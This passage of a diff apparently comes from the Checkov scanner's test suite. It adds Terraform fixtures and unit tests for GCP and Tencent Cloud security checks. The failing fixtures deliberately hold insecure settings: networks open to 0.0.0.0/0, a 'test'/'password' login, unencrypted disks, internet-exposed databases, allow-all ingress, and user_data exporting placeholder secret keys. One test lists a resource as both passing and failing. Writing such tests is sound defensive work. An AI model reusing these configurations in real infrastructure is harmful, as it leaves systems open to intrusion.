-  enable_legacy_abac = True
-  master_authorized_networks_config {
-    cidr_blocks {
-      cidr_block   = "0.0.0.0/0"
-      display_name = "The world"
-    }
-  }
-
-  master_auth {
-    username = "test"
-    password = "password"
-  }
-
-}
-
-resource "google_container_cluster" "pass" {
-  name               = "google_cluster"
-  monitoring_service = "monitoring.googleapis.com"
-  master_authorized_networks_config {}
-  master_auth {
-    client_certificate_config {
-      issue_client_certificate = false
-    }
-  }
-}
-
-resource "google_container_cluster" "pass2" {
-  name               = "google_cluster"
-  monitoring_service = "monitoring.googleapis.com"
-  master_authorized_networks_config {}
-  master_auth {
-    username = ""
-    password = ""
-    client_certificate_config {
-      issue_client_certificate = false
-    }
-  }
-
-}
-
-resource "google_container_cluster" "pass3" {
-  name               = "marcellus-wallace"
-  location           = "us-central1-a"
-  initial_node_count = 3
-
-  timeouts {
-    create = "30m"
-    update = "40m"
-  }
-}
diff --git a/tests/terraform/checks/resource/gcp/example_GoogleIPV6PrivateGoogleEnabled/main.tf b/tests/terraform/checks/resource/gcp/example_GoogleIPV6PrivateGoogleEnabled/main.tf
index cae9e2ec340..9a0995097f0 100644
--- a/tests/terraform/checks/resource/gcp/example_GoogleIPV6PrivateGoogleEnabled/main.tf
+++ b/tests/terraform/checks/resource/gcp/example_GoogleIPV6PrivateGoogleEnabled/main.tf
@@ -30,7 +30,7 @@ resource "google_compute_subnetwork" "fail2" {
 resource "google_compute_subnetwork" "unknown" {
   name             = "log-test-subnetwork"
   ip_cidr_range    = "10.2.0.0/16"
-  stack_type       = "IPV4"
+  stack_type       = "IPV4_ONLY"
   ipv6_access_type = "EXTERNAL"
   region           = "us-central1"
   network          = google_compute_network.custom-test.id
@@ -84,3 +84,17 @@ resource "google_compute_subnetwork" "unknown2" {
      metadata="EXCLUDE_ALL_METADATA"
    }
 }
+
+resource "google_compute_subnetwork" "unknown2" {
+  name             = "log-test-subnetwork"
+  ip_cidr_range    = "10.2.0.0/16"
+  # No stack_type defaults to IPV4_ONLY
+  # stack_type       = "IPV4_IPV6"
+  ipv6_access_type = "EXTERNAL"
+  region           = "us-central1"
+  network          = google_compute_network.custom-test.id
+   purpose="INTERNAL_HTTPS_LOAD_BALANCER"
+   log_config {
+     metadata="EXCLUDE_ALL_METADATA"
+   }
+}
diff --git a/tests/terraform/checks/resource/gcp/test_CloudArmorWAFACLCVE202144228.py b/tests/terraform/checks/resource/gcp/test_CloudArmorWAFACLCVE202144228.py
index 34887dc37e9..ba0d7a22382 100644
--- a/tests/terraform/checks/resource/gcp/test_CloudArmorWAFACLCVE202144228.py
+++ b/tests/terraform/checks/resource/gcp/test_CloudArmorWAFACLCVE202144228.py
@@ -20,19 +20,21 @@ def test(self):
         passing_resources = {
             "google_compute_security_policy.enabled_deny_403",
             "google_compute_security_policy.enabled_deny_404",
+            "google_compute_security_policy.pass_preconfigwaf",
         }
 
         failing_resources = {
             "google_compute_security_policy.allow",
             "google_compute_security_policy.preview",
             "google_compute_security_policy.different_expr",
+            "google_compute_security_policy.pass_preconfigwaf"
         }
 
         passed_check_resources = {c.resource for c in report.passed_checks}
         failed_check_resources = {c.resource for c in report.failed_checks}
 
-        self.assertEqual(summary["passed"], 2)
-        self.assertEqual(summary["failed"], 3)
+        self.assertEqual(summary["passed"], len(passing_resources))
+        self.assertEqual(summary["failed"], len(failing_resources))
         self.assertEqual(summary["skipped"], 0)
         self.assertEqual(summary["parsing_errors"], 0)
 
diff --git a/tests/terraform/checks/resource/gcp/test_CloudFunctionPermissiveIngress.py b/tests/terraform/checks/resource/gcp/test_CloudFunctionPermissiveIngress.py
new file mode 100644
index 00000000000..1c2a6ad8ad6
--- /dev/null
+++ b/tests/terraform/checks/resource/gcp/test_CloudFunctionPermissiveIngress.py
@@ -0,0 +1,42 @@
+import unittest
+import os
+
+from checkov.terraform.checks.resource.gcp.CloudFunctionPermissiveIngress import check
+from checkov.runner_filter import RunnerFilter
+from checkov.terraform.runner import Runner
+
+
+class TestCloudFunctionPermissiveIngress(unittest.TestCase):
+
+    def test(self):
+        runner = Runner()
+        current_dir = os.path.dirname(os.path.realpath(__file__))
+
+        test_files_dir = current_dir + "/example_CloudFunctionPermissiveIngress"
+        report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
+        summary = report.get_summary()
+
+        passing_resources = {
+            'google_cloudfunctions2_function.pass1',
+            'google_cloudfunctions_function.pass2',
+        }
+        failing_resources = {
+            'google_cloudfunctions2_function.fail1',
+            'google_cloudfunctions2_function.fail2_not_specified',
+            'google_cloudfunctions_function.fail3'
+        }
+
+        passed_check_resources = set([c.resource for c in report.passed_checks])
+        failed_check_resources = set([c.resource for c in report.failed_checks])
+
+        self.assertEqual(summary['passed'], 2)
+        self.assertEqual(summary['failed'], 3)
+        self.assertEqual(summary['skipped'], 0)
+        self.assertEqual(summary['parsing_errors'], 0)
+
+        self.assertEqual(passing_resources, passed_check_resources)
+        self.assertEqual(failing_resources, failed_check_resources)
+
+
+if __name__ == '__main__':
+    unittest.main()
\ No newline at end of file
diff --git a/checkov/gitlab_ci/image_referencer/__init__.py b/tests/terraform/checks/resource/tencentcloud/__init__.py
similarity index 100%
rename from checkov/gitlab_ci/image_referencer/__init__.py
rename to tests/terraform/checks/resource/tencentcloud/__init__.py
diff --git a/tests/terraform/checks/resource/tencentcloud/example_CBSEncryption/tencentcloud_cbs_storage.tf b/tests/terraform/checks/resource/tencentcloud/example_CBSEncryption/tencentcloud_cbs_storage.tf
new file mode 100644
index 00000000000..384b8ab3d88
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/example_CBSEncryption/tencentcloud_cbs_storage.tf
@@ -0,0 +1,24 @@
+# pass
+resource "tencentcloud_cbs_storage" "enabled" {
+  storage_type      = "CLOUD_PREMIUM"
+  storage_name      = "tf-storage-basic"
+  storage_size      = 50
+  availability_zone = "ap-guangzhou-3"
+  encrypt           = true
+}
+
+# failed
+resource "tencentcloud_cbs_storage" "default" {
+  storage_type      = "CLOUD_PREMIUM"
+  storage_name      = "tf-storage-basic"
+  storage_size      = 50
+  availability_zone = "ap-guangzhou-3"
+}
+
+resource "tencentcloud_cbs_storage" "disabled" {
+  storage_type      = "CLOUD_PREMIUM"
+  storage_name      = "tf-storage-basic"
+  storage_size      = 50
+  availability_zone = "ap-guangzhou-3"
+  encrypt           = false
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/tencentcloud/example_CDBInternetService/tencentcloud_mysql_instance.tf b/tests/terraform/checks/resource/tencentcloud/example_CDBInternetService/tencentcloud_mysql_instance.tf
new file mode 100644
index 00000000000..13c06f6a582
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/example_CDBInternetService/tencentcloud_mysql_instance.tf
@@ -0,0 +1,50 @@
+# pass
+resource "tencentcloud_mysql_instance" "positive" {
+  internet_service  = 0
+  engine_version    = "5.7"
+  charge_type       = "POSTPAID"
+  slave_deploy_mode = 0
+  availability_zone = data.tencentcloud_availability_zones_by_product.zones.zones.0.name
+  slave_sync_mode   = 1
+  instance_name     = "tf-example-mysql"
+  mem_size          = 4000
+  volume_size       = 200
+  vpc_id            = tencentcloud_vpc.vpc.id
+  subnet_id         = tencentcloud_subnet.subnet.id
+  intranet_port     = 3307
+  security_groups   = [tencentcloud_security_group.security_group.id]
+
+  tags = {
+    name = "test"
+  }
+
+  parameters = {
+    character_set_server = "utf8"
+    max_connections      = "1000"
+  }
+}
+# failed
+resource "tencentcloud_mysql_instance" "negative" {
+  internet_service  = 1
+  engine_version    = "5.7"
+  charge_type       = "POSTPAID"
+  slave_deploy_mode = 0
+  availability_zone = data.tencentcloud_availability_zones_by_product.zones.zones.0.name
+  slave_sync_mode   = 1
+  instance_name     = "tf-example-mysql"
+  mem_size          = 4000
+  volume_size       = 200
+  vpc_id            = tencentcloud_vpc.vpc.id
+  subnet_id         = tencentcloud_subnet.subnet.id
+  intranet_port     = 3307
+  security_groups   = [tencentcloud_security_group.security_group.id]
+
+  tags = {
+    name = "test"
+  }
+
+  parameters = {
+    character_set_server = "utf8"
+    max_connections      = "1000"
+  }
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/tencentcloud/example_CDBIntranetPort/tencentcloud_mysql_instance.tf b/tests/terraform/checks/resource/tencentcloud/example_CDBIntranetPort/tencentcloud_mysql_instance.tf
new file mode 100644
index 00000000000..0ca91390410
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/example_CDBIntranetPort/tencentcloud_mysql_instance.tf
@@ -0,0 +1,48 @@
+# pass
+resource "tencentcloud_mysql_instance" "positive" {
+  engine_version    = "5.7"
+  charge_type       = "POSTPAID"
+  slave_deploy_mode = 0
+  availability_zone = data.tencentcloud_availability_zones_by_product.zones.zones.0.name
+  slave_sync_mode   = 1
+  instance_name     = "tf-example-mysql"
+  mem_size          = 4000
+  volume_size       = 200
+  vpc_id            = tencentcloud_vpc.vpc.id
+  subnet_id         = tencentcloud_subnet.subnet.id
+  intranet_port     = 3307
+  security_groups   = [tencentcloud_security_group.security_group.id]
+
+  tags = {
+    name = "test"
+  }
+
+  parameters = {
+    character_set_server = "utf8"
+    max_connections      = "1000"
+  }
+}
+# failed
+resource "tencentcloud_mysql_instance" "negative" {
+  engine_version    = "5.7"
+  charge_type       = "POSTPAID"
+  slave_deploy_mode = 0
+  availability_zone = data.tencentcloud_availability_zones_by_product.zones.zones.0.name
+  slave_sync_mode   = 1
+  instance_name     = "tf-example-mysql"
+  mem_size          = 4000
+  volume_size       = 200
+  vpc_id            = tencentcloud_vpc.vpc.id
+  subnet_id         = tencentcloud_subnet.subnet.id
+  intranet_port     = 3306
+  security_groups   = [tencentcloud_security_group.security_group.id]
+
+  tags = {
+    name = "test"
+  }
+
+  parameters = {
+    character_set_server = "utf8"
+    max_connections      = "1000"
+  }
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/tencentcloud/example_CLBInstanceLog/tencentcloud_clb_instance.tf b/tests/terraform/checks/resource/tencentcloud/example_CLBInstanceLog/tencentcloud_clb_instance.tf
new file mode 100644
index 00000000000..57ea022fd0c
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/example_CLBInstanceLog/tencentcloud_clb_instance.tf
@@ -0,0 +1,29 @@
+# pass
+resource "tencentcloud_clb_instance" "positive" {
+  network_type                 = "INTERNAL"
+  clb_name                     = "clb_example"
+  project_id                   = 0
+  vpc_id                       = tencentcloud_vpc.vpc_test.id
+  subnet_id                    = tencentcloud_subnet.subnet_test.id
+  load_balancer_pass_to_target = true
+  log_set_id                   = tencentcloud_clb_log_set.set.id
+  log_topic_id                 = tencentcloud_clb_log_topic.topic.id
+
+  tags = {
+    test = "tf"
+  }
+}
+
+# failed
+resource "tencentcloud_clb_instance" "negative" {
+  network_type                 = "INTERNAL"
+  clb_name                     = "clb_example"
+  project_id                   = 0
+  vpc_id                       = tencentcloud_vpc.vpc_test.id
+  subnet_id                    = tencentcloud_subnet.subnet_test.id
+  load_balancer_pass_to_target = true
+
+  tags = {
+    test = "tf"
+  }
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/tencentcloud/example_CLBListenerProtocol/tencentcloud_clb_listener.tf b/tests/terraform/checks/resource/tencentcloud/example_CLBListenerProtocol/tencentcloud_clb_listener.tf
new file mode 100644
index 00000000000..ae94c6937cf
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/example_CLBListenerProtocol/tencentcloud_clb_listener.tf
@@ -0,0 +1,30 @@
+# pass
+resource "tencentcloud_clb_listener" "positive" {
+  clb_id        = "lb-0lh5au7v"
+  listener_name = "test_listener"
+  protocol      = "HTTPS"
+  port          = 443
+}
+
+# failed
+resource "tencentcloud_clb_listener" "negative1" {
+  clb_id        = "lb-0lh5au7v"
+  listener_name = "test_listener"
+  protocol      = "HTTP"
+  port          = 80
+}
+
+resource "tencentcloud_clb_listener" "negative2" {
+  clb_id        = "lb-0lh5au7v"
+  listener_name = "test_listener"
+  protocol      = "TCP"
+  port          = 8080
+}
+
+resource "tencentcloud_clb_listener" "negative3" {
+  clb_id        = "lb-0lh5au7v"
+  listener_name = "test_listener"
+  protocol      = "UDP"
+  port          = 8090
+}
+
diff --git a/tests/terraform/checks/resource/tencentcloud/example_CVMAllocatePublicIp/tencentcloud_instance.tf b/tests/terraform/checks/resource/tencentcloud/example_CVMAllocatePublicIp/tencentcloud_instance.tf
new file mode 100644
index 00000000000..0850a3d45da
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/example_CVMAllocatePublicIp/tencentcloud_instance.tf
@@ -0,0 +1,18 @@
+# pass
+resource "tencentcloud_instance" "default" {
+  instance_name     = "tf-cvm-basic"
+  availability_zone = "ap-guangzhou-3"
+}
+
+resource "tencentcloud_instance" "disabled" {
+  instance_name      = "tf-cvm-basic"
+  availability_zone  = "ap-guangzhou-3"
+  allocate_public_ip = false
+}
+
+# failed
+resource "tencentcloud_instance" "enabled" {
+  instance_name      = "tf-cvm-basic"
+  availability_zone  = "ap-guangzhou-3"
+  allocate_public_ip = true
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/tencentcloud/example_CVMDisableMonitorService/tencentcloud_instance.tf b/tests/terraform/checks/resource/tencentcloud/example_CVMDisableMonitorService/tencentcloud_instance.tf
new file mode 100644
index 00000000000..bebda0db922
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/example_CVMDisableMonitorService/tencentcloud_instance.tf
@@ -0,0 +1,18 @@
+# pass
+resource "tencentcloud_instance" "default" {
+  instance_name     = "tf-cvm-basic"
+  availability_zone = "ap-guangzhou-3"
+}
+
+resource "tencentcloud_instance" "disabled" {
+  instance_name           = "tf-cvm-basic"
+  availability_zone       = "ap-guangzhou-3"
+  disable_monitor_service = false
+}
+
+# failed
+resource "tencentcloud_instance" "enabled" {
+  instance_name           = "tf-cvm-basic"
+  availability_zone       = "ap-guangzhou-3"
+  disable_monitor_service = true
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/tencentcloud/example_CVMUseDefaultSecurityGroup/tencentcloud_instance.tf b/tests/terraform/checks/resource/tencentcloud/example_CVMUseDefaultSecurityGroup/tencentcloud_instance.tf
new file mode 100644
index 00000000000..79e4ee6102b
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/example_CVMUseDefaultSecurityGroup/tencentcloud_instance.tf
@@ -0,0 +1,30 @@
+# pass
+resource "tencentcloud_instance" "default" {
+  instance_name     = "tf-cvm-basic"
+  availability_zone = "ap-guangzhou-3"
+}
+
+resource "tencentcloud_instance" "orderly_security_groups_sg" {
+  instance_name           = "tf-cvm-basic"
+  availability_zone       = "ap-guangzhou-3"
+  orderly_security_groups = ["tencentcloud_security_group.sg.id"]
+}
+
+resource "tencentcloud_instance" "security_groups_sg" {
+  instance_name     = "tf-cvm-basic"
+  availability_zone = "ap-guangzhou-3"
+  security_groups   = ["tencentcloud_security_group.sg.id"]
+}
+
+# failed
+resource "tencentcloud_instance" "orderly_security_groups_default" {
+  instance_name           = "tf-cvm-basic"
+  availability_zone       = "ap-guangzhou-3"
+  orderly_security_groups = ["tencentcloud_security_group.default.id"]
+}
+
+resource "tencentcloud_instance" "security_groups_default" {
+  instance_name     = "tf-cvm-basic"
+  availability_zone = "ap-guangzhou-3"
+  security_groups   = ["tencentcloud_security_group.default.id"]
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/tencentcloud/example_CVMUseDefaultVPC/tencentcloud_instance.tf b/tests/terraform/checks/resource/tencentcloud/example_CVMUseDefaultVPC/tencentcloud_instance.tf
new file mode 100644
index 00000000000..81ec8845990
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/example_CVMUseDefaultVPC/tencentcloud_instance.tf
@@ -0,0 +1,35 @@
+# pass
+resource "tencentcloud_instance" "default" {
+  instance_name     = "tf-cvm-basic"
+  availability_zone = "ap-guangzhou-3"
+
+}
+
+resource "tencentcloud_instance" "positive" {
+  instance_name     = "tf-cvm-basic"
+  availability_zone = "ap-guangzhou-3"
+  vpc_id            = tencentcloud_vpc.vpc.id
+  subnet_id         = tencentcloud_subnet.subnet.id
+}
+
+# failed
+resource "tencentcloud_instance" "negative1" {
+  instance_name     = "tf-cvm-basic"
+  availability_zone = "ap-guangzhou-3"
+  vpc_id            = tencentcloud_vpc.default.id
+  subnet_id         = tencentcloud_subnet.subnet.id
+}
+
+resource "tencentcloud_instance" "negative2" {
+  instance_name     = "tf-cvm-basic"
+  availability_zone = "ap-guangzhou-3"
+  vpc_id            = tencentcloud_vpc.vpc.id
+  subnet_id         = tencentcloud_subnet.default.id
+}
+
+resource "tencentcloud_instance" "negative3" {
+  instance_name     = "tf-cvm-basic"
+  availability_zone = "ap-guangzhou-3"
+  vpc_id            = tencentcloud_vpc.default.id
+  subnet_id         = tencentcloud_subnet.default.id
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/tencentcloud/example_CVMUserData/tencentcloud_instance.tf b/tests/terraform/checks/resource/tencentcloud/example_CVMUserData/tencentcloud_instance.tf
new file mode 100644
index 00000000000..940b81949ec
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/example_CVMUserData/tencentcloud_instance.tf
@@ -0,0 +1,57 @@
+# pass
+resource "tencentcloud_instance" "positive1" {
+  instance_name     = "cvm_postpaid"
+  availability_zone = data.tencentcloud_availability_zones.my_favorite_zones.zones.0.name
+  image_id          = data.tencentcloud_images.my_favorite_image.images.0.image_id
+  instance_type     = data.tencentcloud_instance_types.my_favorite_instance_types.instance_types.0.instance_type
+  system_disk_type  = "CLOUD_PREMIUM"
+  system_disk_size  = 50
+}
+
+resource "tencentcloud_instance" "positive2" {
+  instance_name     = "cvm_postpaid"
+  availability_zone = data.tencentcloud_availability_zones.my_favorite_zones.zones.0.name
+  image_id          = data.tencentcloud_images.my_favorite_image.images.0.image_id
+  instance_type     = data.tencentcloud_instance_types.my_favorite_instance_types.instance_types.0.instance_type
+  system_disk_type  = "CLOUD_PREMIUM"
+  system_disk_size  = 50
+
+  user_data = base64encode("this is test value")
+}
+
+resource "tencentcloud_instance" "positive3" {
+  instance_name     = "cvm_postpaid"
+  availability_zone = data.tencentcloud_availability_zones.my_favorite_zones.zones.0.name
+  image_id          = data.tencentcloud_images.my_favorite_image.images.0.image_id
+  instance_type     = data.tencentcloud_instance_types.my_favorite_instance_types.instance_types.0.instance_type
+  system_disk_type  = "CLOUD_PREMIUM"
+  system_disk_size  = 50
+
+  user_data_raw = "this is test value"
+}
+
+
+# failed
+resource "tencentcloud_instance" "negative1" {
+  instance_name     = "cvm_postpaid"
+  availability_zone = data.tencentcloud_availability_zones.my_favorite_zones.zones.0.name
+  image_id          = data.tencentcloud_images.my_favorite_image.images.0.image_id
+  instance_type     = data.tencentcloud_instance_types.my_favorite_instance_types.instance_types.0.instance_type
+  system_disk_type  = "CLOUD_PREMIUM"
+  system_disk_size  = 50
+
+  user_data = base64encode("apt-get install -y tccli; export TENCENTCLOUD_SECRET_ID=your_access_key_id_here; export TENCENTCLOUD_SECRET_KEY=your_secret_access_key_here")
+
+}
+
+resource "tencentcloud_instance" "negative2" {
+  instance_name     = "cvm_postpaid"
+  availability_zone = data.tencentcloud_availability_zones.my_favorite_zones.zones.0.name
+  image_id          = data.tencentcloud_images.my_favorite_image.images.0.image_id
+  instance_type     = data.tencentcloud_instance_types.my_favorite_instance_types.instance_types.0.instance_type
+  system_disk_type  = "CLOUD_PREMIUM"
+  system_disk_size  = 50
+
+  user_data_raw = "apt-get install -y tccli; export TENCENTCLOUD_SECRET_ID=your_access_key_id_here; export TENCENTCLOUD_SECRET_KEY=your_secret_access_key_here"
+
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/tencentcloud/example_TKELogAgentEnable/tencentcloud_kubernetes_cluster.tf b/tests/terraform/checks/resource/tencentcloud/example_TKELogAgentEnable/tencentcloud_kubernetes_cluster.tf
new file mode 100644
index 00000000000..227a3b4f799
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/example_TKELogAgentEnable/tencentcloud_kubernetes_cluster.tf
@@ -0,0 +1,85 @@
+# pass
+resource "tencentcloud_kubernetes_cluster" "positive" {
+  vpc_id                  = tencentcloud_vpc.vpc.id
+  cluster_max_pod_num     = 32
+  cluster_name            = "test"
+  cluster_desc            = "test cluster desc"
+  cluster_max_service_num = 256
+  cluster_internet        = true
+  cluster_deploy_type     = "MANAGED_CLUSTER"
+  network_type            = "VPC-CNI"
+  eni_subnet_ids          = ["subnet-bk1etlyu"]
+  service_cidr            = "10.1.0.0/24"
+
+  worker_config {
+    count                      = 1
+    availability_zone          = "ap-guangzhou-7"
+    instance_type              = "S2.LARGE16"
+    system_disk_type           = "CLOUD_PREMIUM"
+    system_disk_size           = 60
+    internet_charge_type       = "TRAFFIC_POSTPAID_BY_HOUR"
+    internet_max_bandwidth_out = 100
+    public_ip_assigned         = true
+    subnet_id                  = "subnet-t5dv27rs"
+
+    data_disk {
+      disk_type = "CLOUD_PREMIUM"
+      disk_size = 50
+    }
+
+    enhanced_security_service = false
+    enhanced_monitor_service  = false
+  }
+
+  log_agent {
+    enabled = true
+  }
+
+  labels = {
+    "test1" = "test1",
+    "test2" = "test2",
+  }
+}
+
+# failed
+resource "tencentcloud_kubernetes_cluster" "negative" {
+  vpc_id                  = tencentcloud_vpc.vpc.id
+  cluster_max_pod_num     = 32
+  cluster_name            = "test"
+  cluster_desc            = "test cluster desc"
+  cluster_max_service_num = 256
+  cluster_internet        = true
+  cluster_deploy_type     = "MANAGED_CLUSTER"
+  network_type            = "VPC-CNI"
+  eni_subnet_ids          = ["subnet-bk1etlyu"]
+  service_cidr            = "10.1.0.0/24"
+
+  worker_config {
+    count                      = 1
+    availability_zone          = "ap-guangzhou-7"
+    instance_type              = "S2.LARGE16"
+    system_disk_type           = "CLOUD_PREMIUM"
+    system_disk_size           = 60
+    internet_charge_type       = "TRAFFIC_POSTPAID_BY_HOUR"
+    internet_max_bandwidth_out = 100
+    public_ip_assigned         = true
+    subnet_id                  = "subnet-t5dv27rs"
+
+    data_disk {
+      disk_type = "CLOUD_PREMIUM"
+      disk_size = 50
+    }
+
+    enhanced_security_service = false
+    enhanced_monitor_service  = false
+  }
+
+  log_agent {
+    enabled = false
+  }
+
+  labels = {
+    "test1" = "test1",
+    "test2" = "test2",
+  }
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/tencentcloud/example_TKEPublicIpAssigned/tencentcloud_kubernetes_cluster.tf b/tests/terraform/checks/resource/tencentcloud/example_TKEPublicIpAssigned/tencentcloud_kubernetes_cluster.tf
new file mode 100644
index 00000000000..b31b8e5fe0d
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/example_TKEPublicIpAssigned/tencentcloud_kubernetes_cluster.tf
@@ -0,0 +1,165 @@
+# pass
+resource "tencentcloud_kubernetes_cluster" "positive1" {
+  vpc_id                          = local.first_vpc_id
+  cluster_cidr                    = "10.31.0.0/16"
+  cluster_max_pod_num             = 32
+  cluster_name                    = "tf_example_cluster"
+  cluster_desc                    = "example for tke cluster"
+  cluster_max_service_num         = 32
+  cluster_internet                = true
+  cluster_internet_security_group = local.sg_id
+  cluster_version                 = "1.22.5"
+  cluster_deploy_type             = "MANAGED_CLUSTER"
+
+  master_config {
+    count                = 1
+    availability_zone    = "ap-guangzhou-3"
+    instance_type        = "SA2.2XLARGE16"
+    system_disk_type     = "CLOUD_SSD"
+    system_disk_size     = 60
+    internet_charge_type = "TRAFFIC_POSTPAID_BY_HOUR"
+    subnet_id            = local.first_subnet_id
+    img_id               = local.image_id
+
+    data_disk {
+      disk_type = "CLOUD_PREMIUM"
+      disk_size = 50
+    }
+
+    enhanced_security_service = false
+    enhanced_monitor_service  = false
+    user_data                 = "dGVzdA=="
+  }
+
+  worker_config {
+    count                = 1
+    availability_zone    = "ap-guangzhou-4"
+    instance_type        = "SA2.2XLARGE16"
+    system_disk_type     = "CLOUD_SSD"
+    system_disk_size     = 60
+    internet_charge_type = "TRAFFIC_POSTPAID_BY_HOUR"
+    subnet_id            = local.second_subnet_id
+
+    data_disk {
+      disk_type = "CLOUD_PREMIUM"
+      disk_size = 50
+    }
+
+    enhanced_security_service = false
+    enhanced_monitor_service  = false
+    cam_role_name             = "CVM_QcsRole"
+  }
+}
+
+resource "tencentcloud_kubernetes_cluster" "positive2" {
+  vpc_id                          = local.first_vpc_id
+  cluster_cidr                    = "10.31.0.0/16"
+  cluster_max_pod_num             = 32
+  cluster_name                    = "tf_example_cluster"
+  cluster_desc                    = "example for tke cluster"
+  cluster_max_service_num         = 32
+  cluster_internet                = true
+  cluster_internet_security_group = local.sg_id
+  cluster_version                 = "1.22.5"
+  cluster_deploy_type             = "MANAGED_CLUSTER"
+
+  master_config {
+    count                      = 1
+    availability_zone          = "ap-guangzhou-3"
+    instance_type              = "SA2.2XLARGE16"
+    system_disk_type           = "CLOUD_SSD"
+    system_disk_size           = 60
+    internet_charge_type       = "TRAFFIC_POSTPAID_BY_HOUR"
+    internet_max_bandwidth_out = 100
+    subnet_id                  = local.first_subnet_id
+    img_id                     = local.image_id
+    public_ip_assigned         = false
+
+    data_disk {
+      disk_type = "CLOUD_PREMIUM"
+      disk_size = 50
+    }
+
+    enhanced_security_service = false
+    enhanced_monitor_service  = false
+    user_data                 = "dGVzdA=="
+  }
+
+  worker_config {
+    count                      = 1
+    availability_zone          = "ap-guangzhou-4"
+    instance_type              = "SA2.2XLARGE16"
+    system_disk_type           = "CLOUD_SSD"
+    system_disk_size           = 60
+    internet_charge_type       = "TRAFFIC_POSTPAID_BY_HOUR"
+    internet_max_bandwidth_out = 100
+    subnet_id                  = local.second_subnet_id
+    public_ip_assigned         = false
+
+    data_disk {
+      disk_type = "CLOUD_PREMIUM"
+      disk_size = 50
+    }
+
+    enhanced_security_service = false
+    enhanced_monitor_service  = false
+    cam_role_name             = "CVM_QcsRole"
+  }
+}
+
+# failed
+resource "tencentcloud_kubernetes_cluster" "negative" {
+  vpc_id                          = local.first_vpc_id
+  cluster_cidr                    = "10.31.0.0/16"
+  cluster_max_pod_num             = 32
+  cluster_name                    = "tf_example_cluster"
+  cluster_desc                    = "example for tke cluster"
+  cluster_max_service_num         = 32
+  cluster_internet                = true
+  cluster_internet_security_group = local.sg_id
+  cluster_version                 = "1.22.5"
+  cluster_deploy_type             = "MANAGED_CLUSTER"
+
+  master_config {
+    count                      = 1
+    availability_zone          = "ap-guangzhou-3"
+    instance_type              = "SA2.2XLARGE16"
+    system_disk_type           = "CLOUD_SSD"
+    system_disk_size           = 60
+    internet_charge_type       = "TRAFFIC_POSTPAID_BY_HOUR"
+    internet_max_bandwidth_out = 100
+    subnet_id                  = local.first_subnet_id
+    img_id                     = local.image_id
+    public_ip_assigned         = true
+
+    data_disk {
+      disk_type = "CLOUD_PREMIUM"
+      disk_size = 50
+    }
+
+    enhanced_security_service = false
+    enhanced_monitor_service  = false
+    user_data                 = "dGVzdA=="
+  }
+
+  worker_config {
+    count                      = 1
+    availability_zone          = "ap-guangzhou-4"
+    instance_type              = "SA2.2XLARGE16"
+    system_disk_type           = "CLOUD_SSD"
+    system_disk_size           = 60
+    internet_charge_type       = "TRAFFIC_POSTPAID_BY_HOUR"
+    internet_max_bandwidth_out = 100
+    subnet_id                  = local.second_subnet_id
+    public_ip_assigned         = true
+
+    data_disk {
+      disk_type = "CLOUD_PREMIUM"
+      disk_size = 50
+    }
+
+    enhanced_security_service = false
+    enhanced_monitor_service  = false
+    cam_role_name             = "CVM_QcsRole"
+  }
+}
diff --git a/tests/terraform/checks/resource/tencentcloud/example_VPCFlowLogConfigEnable/tencentcloud_vpc_flow_log_config.tf b/tests/terraform/checks/resource/tencentcloud/example_VPCFlowLogConfigEnable/tencentcloud_vpc_flow_log_config.tf
new file mode 100644
index 00000000000..bfe38c3af68
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/example_VPCFlowLogConfigEnable/tencentcloud_vpc_flow_log_config.tf
@@ -0,0 +1,11 @@
+# pass
+resource "tencentcloud_vpc_flow_log_config" "positive" {
+  flow_log_id = tencentcloud_vpc_flow_log.example.id
+  enable      = true
+}
+
+# failed
+resource "tencentcloud_vpc_flow_log_config" "negative" {
+  flow_log_id = tencentcloud_vpc_flow_log.example.id
+  enable      = false
+}
\ No newline at end of file
diff --git a/tests/terraform/checks/resource/tencentcloud/example_VPCSecurityGroupRuleSet/tencentcloud_security_group_rule_set.tf b/tests/terraform/checks/resource/tencentcloud/example_VPCSecurityGroupRuleSet/tencentcloud_security_group_rule_set.tf
new file mode 100644
index 00000000000..9474b9cd82f
--- /dev/null
+++ b/tests/terraform/checks/resource/tencentcloud/example_VPCSecurityGroupRuleSet/tencentcloud_security_group_rule_set.tf
@@ -0,0 +1,46 @@
+# pass
+resource "tencentcloud_security_group_rule_set" "positive" {
+  security_group_id = tencentcloud_security_group.base.id
+
+  ingress {
+    action      = "ACCEPT"
+    cidr_block  = "10.0.0.0/22"
+    protocol    = "TCP"
+    port        = "80-90"
+    description = "A:Allow Ips and 80-90"
+  }
+
+}
+# failed
+resource "tencentcloud_security_group_rule_set" "negative1" {
+  security_group_id = tencentcloud_security_group.base.id
+
+  ingress {
+    action     = "ACCEPT"
+    cidr_block = "0.0.0.0/0"
+    protocol   = "ALL"
+    port       = "ALL"
+  }
+}
+
+resource "tencentcloud_security_group_rule_set" "negative2" {
+  security_group_id = tencentcloud_security_group.base.id
+
+  ingress {
+    action          = "ACCEPT"
+    ipv6_cidr_block = "::/0"
+    protocol        = "ALL"
+    port            = "ALL"
+  }
+}
+
+resource "tencentcloud_security_group_rule_set" "negative3" {
+  security_group_id = tencentcloud_security_group.base.id
+
+  ingress {
+    action          = "ACCEPT"
